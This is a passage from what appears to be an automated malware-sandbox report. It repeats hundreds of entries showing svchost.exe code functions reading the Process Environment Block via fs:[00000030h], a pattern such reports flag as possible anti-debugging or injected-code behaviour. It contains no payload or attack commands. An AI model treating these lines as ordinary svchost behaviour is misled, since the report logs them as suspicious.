            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h]1_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736259 mov eax, dword ptr fs:[00000030h]1_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h]1_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h]1_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372823B mov eax, dword ptr fs:[00000030h]1_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038062D6 mov eax, dword ptr fs:[00000030h]1_2_038062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A2C3 mov eax, dword ptr fs:[00000030h]1_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380625D mov eax, dword ptr fs:[00000030h]1_2_0380625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h]1_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h]1_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760124 mov eax, dword ptr fs:[00000030h]1_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h]1_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h]1_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h]1_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]1_2_03804164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]1_2_03804164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03770185 mov eax, dword ptr fs:[00000030h]1_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h]1_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732050 mov eax, dword ptr fs:[00000030h]1_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h]1_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h]1_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h]1_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h]1_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h]1_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h]1_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h]1_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h]1_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h]1_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h]1_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h]1_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h]1_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037280A0 mov eax, dword ptr fs:[00000030h]1_2_037280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h]1_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373208A mov eax, dword ptr fs:[00000030h]1_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738770 mov eax, dword ptr fs:[00000030h]1_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03730750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03730710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03760710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037D678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03762674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03766620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03768620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03772619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
